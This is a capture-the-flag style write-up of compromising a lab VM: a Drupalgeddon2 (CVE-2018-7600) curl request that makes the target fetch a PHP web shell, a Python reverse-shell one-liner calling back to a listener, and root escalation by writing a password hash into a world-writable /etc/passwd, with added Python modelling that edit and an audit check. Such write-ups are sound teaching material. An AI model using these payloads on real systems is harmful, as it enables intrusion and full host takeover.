Hello Friends,
This is my first boot2root writeup, on a vulnerable machine made by my brother Manish Kishan Tanwar.
This machine is built around what was, at the time, the latest Drupal CMS vulnerability: Drupalgeddon2 (CVE-2018-7600).
Let's get started ...
Since port 80 was open, I started by testing the web app. The page source made it clear that the site was running the Drupal CMS, and I confirmed the version from changelog.txt.
The Drupal version in use was 8.x. That rang a bell, so I decided to try the well-known Drupalgeddon2 exploit, using curl.
I used the following command to make the target download a PHP web shell. The request abuses the Form API render array of the user registration form: element_parents points at the mail field's #value, mail[#post_render][] registers exec as a render callback, and mail[#children] is the string exec receives as its command. Note that PHP's exec() only returns the last line of output, which is why single-line commands such as id are the usual test; the trailing cut just trims the JSON AJAX response down to that output -
curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5
Through the PHP shell I got a reverse shell back to a netcat listener on 192.168.1.78 port 1337 using this Python one-liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The reverse shell I got was not interactive, so I spawned a TTY with: python -c 'import pty;pty.spawn("/bin/sh")'
I tried several things, including running some kernel exploits, before noticing that /etc/passwd had every permission bit set (it was world-writable), so I could edit it. One of the accounts in /etc/passwd had a password hash in its second field instead of the usual "x". I had seen the same thing in the OSCP labs, so I generated a hash for a password of my choice and put it into the root user's entry in /etc/passwd.
If a password hash is present in the second field of /etc/passwd, it is used instead of the one in /etc/shadow: the "x" placeholder is what tells pam_unix to consult /etc/shadow at all, and anything else in that field is treated as the hash itself. With root's field replaced by my hash, I was able to log in as root. On a correctly configured system /etc/passwd is mode 0644 and owned by root; a quick ls -l /etc/passwd (or find / -writable -type f 2>/dev/null) is how to spot this misconfiguration during enumeration.
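The following is an added example, not part of the original writeup. It models the precedence rule just described (a literal "x" in field 2 of /etc/passwd defers to /etc/shadow; any other value is used as the hash directly, which is what pam_unix does), reproduces the edit to root's entry, and includes the permission check a practitioner would run. The passwd and shadow contents and the hash strings are constructed placeholders, not data from the VM; the real hash would come from something like openssl passwd -1 (or -6 on newer OpenSSL).

```python
"""/etc/passwd vs /etc/shadow precedence, the root-entry edit, and an audit check.

Added example, not the writeup's own code. File contents and hashes below
are constructed placeholders; no real hashes are included.
"""
import os
import stat
from typing import Optional

# Constructed sample files (hash strings are placeholders, not real hashes).
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
SHADOW = (
    "root:$6$shadowsalt$shadowhashxxx:17700:0:99999:7:::\n"
    "www-data:*:17700:0:99999:7:::\n"
)


def _field(text: str, user: str, idx: int) -> Optional[str]:
    """Return column `idx` of `user`'s line in a colon-separated file."""
    for line in text.splitlines():
        parts = line.split(":")
        if parts and parts[0] == user and len(parts) > idx:
            return parts[idx]
    return None


def effective_hash(user: str, passwd_text: str, shadow_text: str) -> Optional[str]:
    """Which hash a pam_unix-style login would check for `user`.

    Only the literal "x" marks the shadow entry as authoritative; any other
    value in field 2 of /etc/passwd is taken as the hash itself.
    """
    pw_field = _field(passwd_text, user, 1)
    if pw_field is None:
        return None
    if pw_field == "x":
        return _field(shadow_text, user, 1)
    return pw_field


def inject_root_hash(passwd_text: str, new_hash: str, user: str = "root") -> str:
    """Reproduce the writeup's escalation: replace the 'x' in the target entry.

    Returns the edited file text rather than writing anywhere.
    """
    out = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if parts[0] == user:
            parts[1] = new_hash
        out.append(":".join(parts))
    return "\n".join(out) + "\n"


def passwd_is_writable_by_others(mode: int) -> bool:
    """Audit check: /etc/passwd should be 0644 root:root.

    Group- or world-write on it is exactly the bug this box was built on.
    """
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path: str = "/etc/passwd") -> bool:
    """True if the file at `path` is writable by group or others."""
    return passwd_is_writable_by_others(os.stat(path).st_mode)


if __name__ == "__main__":
    print("root hash before edit:", effective_hash("root", PASSWD, SHADOW))
    patched = inject_root_hash(PASSWD, "$1$xyz$constructedhash")
    print("root hash after edit: ", effective_hash("root", patched, SHADOW))
    print("/etc/passwd writable by others:", audit_passwd_file())
```

The point of effective_hash() is the asymmetry: nothing in /etc/shadow can override a hash placed in /etc/passwd, so write access to /etc/passwd alone is a full root compromise even when /etc/shadow stays protected.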
Thanks for reading. Happy Hacking ;)